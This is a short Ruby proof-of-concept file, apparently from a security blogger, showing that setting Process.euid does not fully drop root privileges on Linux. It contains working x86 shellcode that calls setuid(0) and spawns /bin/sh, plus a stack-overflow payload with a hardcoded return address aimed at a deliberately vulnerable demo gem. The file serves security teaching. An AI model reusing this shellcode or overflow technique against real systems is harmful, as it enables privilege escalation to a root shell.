gistfile1.rb

##  
##  sneak peak at a potential future blog post @ http://timetobleed.com
##
##  this demos how using Process.euid= isn't strong enough for dropping privs
##  in linux. you need to use Process::Sys.setres[uid|gid] instead.
## 
##  execute this file as root, it will drop privs to nobody, then call an evil
##  ruby function that has a buffer overflow/double free/format string/etc vuln.
##  
##  (in this demo case i wrote BadGem which just does a blind strcpy, but you can
##   imagine a poorly written ruby gem or bug in ruby or whatever)
##
##  the shellcode executes, calls setuid(0) and then execve("/bin/sh", 0, 0)
##  
##  ... which lands you in a root shell - EVEN THOUGH you dropped to nobody before.


## a few notes about this:
##    - x86 32bit shellcode; definitely doesn't work on x86_64
##    - these addresses are hardcoded for my linux box, lame BUT this isn't a buffer 
##      overflow exercise, its just a proof-of-concept.
##    - as a result this probably wont work on your box
##
##    if there is enough interest, maybe i'll re-write it to be more realistic.    

require 'rubygems'
require 'badgem'

## x86 32 shellcode
## setuid(0)
## execve("/sh/bin", 0, 0)
s = "\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80"

# fill the buffer with some yummy meat
10.times  { s += "MEAT" }
2.times   { s += "!" }

# overwrite saved ebp
s += "joe!" 

# overwrite saved eip
s += "\xe0\xf6\xff\xbf"

puts Process.pid

##  Switch ruby process to run as "nobody", so I should be safe right?
Process.euid = Etc.getpwnam("nobody").uid

BadGem::bad(s)